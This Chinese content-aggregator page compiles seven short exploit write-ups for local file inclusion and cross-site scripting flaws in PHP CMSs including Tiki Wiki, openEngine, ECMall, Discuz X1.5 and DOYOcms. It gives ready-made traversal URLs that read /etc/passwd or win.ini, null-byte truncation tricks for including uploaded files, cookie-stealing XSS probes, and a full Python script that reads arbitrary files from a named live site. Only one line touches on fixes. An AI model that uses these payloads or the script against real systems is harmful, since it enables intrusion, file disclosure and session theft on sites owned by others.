ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复

时间:2022-05-06 11:51:48 其他范文 收藏本文 下载本文

ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复((整理7篇))由网友“jjq598”投稿提供,下面是小编为大家推荐的ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复,欢迎阅读,希望大家能够喜欢。

ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复

篇1:ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复

攻击者可以通过浏览器利用这些问题,利用一个跨站点脚本问题,攻击者必须诱使不知情的用户点击一个恶意的URI。

本地文件漏洞EXP:

网站/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini

跨站脚本漏洞:

网站/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

注:首发孤独浪子,由情整理编辑

防范:

过滤或临时加入通用防注入文件

篇2:openEngine 2.0 100226 本地文件包含和跨站脚本漏洞

openEngine是一款使用PHP开发的Web内容管理系统,openEngine 2.0 100226存在本地包含及跨站脚本漏洞,可能导致敏感信息泄露,

[+]info:

~~~~~~~~~

openEngine 2.0 100226 LFI and XSS Vulnerabilities

Vendor : www.openengine.de

Advisory : secpod.org/blog/?p=152

secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt

Version : openEngine 2.0 100226; other versions may also be affected.

Download : www.openengine.de/download/openengine20_100226.zip

Date : 11/16/

[+]poc:

~~~~~~~~~

* local file inclusion,

localhost/cms/website.php?template=../../../../../../../../etc/passwd%00

* XSS,

alert(document.cookie)localhost/cms/website.php?template=

[+]Reference:

~~~~~~~~~

secpod.org/advisories/SECPOD_Openengine_LFI_XSS_Vuln.txt

出自:BugZone

篇3:mobile9 本地文件包含漏洞

因为他是base64编码的手工测试很麻烦就写了个小工具,高手飘过

import urllib2,sys

import httplib

import base64,time

if len(sys.argv) <= 2:

print “=” * 30

print “mobile9.com local exploit by cnb|rd Qq:441303228”

print “Email:Linuxrootkit@gmail.com”

print “=” * 30

print

print “usage: ” + sys.argv[0] + “ hostname ” + “ local file ”

print

sys.exit(1)

host = sys.argv[1]

path = sys.argv[2]

file = sys.argv[3]

h = httplib.HTTP(host)

h.putrequest(“HEAD”, path)

h.putheader(“Host”, host)

h.endheaders

okresp, reason, headers = h.getreply()

print “=” * 30

print host + “ Server Banner is ” + headers.get(“Server”)

print “=” * 30

print “Local file to read is ” + file

time = int(time.time())

serverpath = “/download/content_delivery.php?key=”

str = str(file) + “|” + str(time) + “|”

print str

base64file = base64.urlsafe_b64encode(str)

requestpath = serverpath + base64file

print base64file

print requestpath

f = httplib.HTTPConnection(host)

f.request('GET', requestpath)

print f.getresponse().read()

f.close

CSDN博客cnbird2008

篇4:ECMall本地文件包含漏洞

by Ryat

bbs.wolvez.org

respond.php 48行

$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';

...

$plugin_file = ROOT_PATH . '/includes/payment/' . $pay_code . '.php';

if (is_file($plugin_file))

{

include_once($plugin_file);很明显的一个bug

利用的话可以参考flyh4t提到过[bbs.wolvez.org/topic/56/]的一个思路:

可以通过旁注拿个shell,然后写个main.php到/tmp目录下,然后包含之

篇5:Pulse CMS Basic 本地文件包含漏洞及修复

Pulse CMS Basic是一款简单的内容管理系统,Pulse CMS Basic <1.29版中的index.php文件存在本地文件包含漏洞,可能导致敏感信息泄露,

[+]info:

~~~~~~~~~

'Pulse CMS Basic' Local File Inclusion Vulnerability

Mark Stanislav - mark.stanislav@gmail.com

CVE--4330

[+]poc:

~~~~~~~~~

www.example.com/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00

[+]Reference:

~~~~~~~~~

www.uncompiled.com/2010/12/pulse-cms-basic-local-file-inclusion-vulnerability-cve-2010-4330/

篇6:DISCUZX1.5 本地文件包含漏洞漏洞预警

DISCUZX1.5 本地文件包含,当然是有条件的,就是使用文件作为缓存,

config_global.php

$_config['cache']['type'] = 'file';

function cachedata($cachenames) {

......

$isfilecache = getglobal('config/cache/type') == 'file';

......

if($isfilecache) {

$lostcaches = array;

foreach($cachenames as $cachename) {

if(!@include_once(DISCUZ_ROOT.'./data/cache/cache_'.$cachename.'.php')) {

$lostcaches[] = $cachename;

}

}

......

}

地址:

localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

localhost:8080/bbs/forum.php?mod=post&action=threadsorts&sortid=ygjgj/../../../api/uc

Authracation has expiried

执行了 api/uc.php 页面代码了,

作者: Jannock

篇7:DOYOcms 本地文件包含漏洞漏洞预警

这是这套CMS ,这个很简洁,。。

这里的$handle_controller = syClass($__controller, null, $GLOBALS['G_DY'][“controller_path”].'/'.$__controller.“.php”);

接下来往下看

这里的$sdir 没有经过任何过滤来的,然后看下这个import函数

这里直接包含了该文件

require($sfilename);

所以结合前面的

$GLOBALS['G_DY'][“controller_path”].'/'.$__controller.“.php”

$__controller是我们可控的变量,也没有经过任何过滤,我们想可以通过%00截断,然后包含我们上传的文件就达到了目的

这也就是鸡肋的地方了,如果要截断,要保证php版本小于5.4(我自己也记不太清了) 因为高版本的修复了该截断的漏洞,

然后这里要保证魔术常量是关闭的。

下图就是成功包含的图

Exp:

localhost/test/index.php?c=../uploads/2012/06/1.gif%00&a=type&tid=1

Linux Kernel ELF文件跨区域映射本地拒绝服务漏洞

跨站脚本漏洞的利用教程

确保PHP应用程序的安全[2]WEB安全

鸡肋的反射性xss脚本安全

也谈跨站脚本攻击与防御脚本安全

星光贴吧1.3 后台拿SHELL及修复方案漏洞预警

脚本范文

关于DOM xss跨站的一点点经验之谈

securytas.ro sql 注入

phpfusion的一个Xday分析脚本安全

ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复
《ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【ki Wiki CMS群件本地文件包含和跨站脚本漏洞及修复(整理7篇)】相关文章:

规章制度执行有漏洞2023-09-16

对于跨不同服务器的sql脚本执行语言的摘要数据库教程2023-08-05

校园网络安全自查报告2022-05-06

PHP安全 XSS篇2022-08-02

web安全学习之xss个人总结2023-02-14

Discuz论坛安全加固WEB安全2023-01-14

广告脚本范文2023-07-17

雅虎发布新版Jukebox软件修补数个安全缺陷2022-10-02

学校网络安全和数据安全的自查报告2022-05-04

Win8全新文件资源管理器 直观好用功能丰富2023-09-12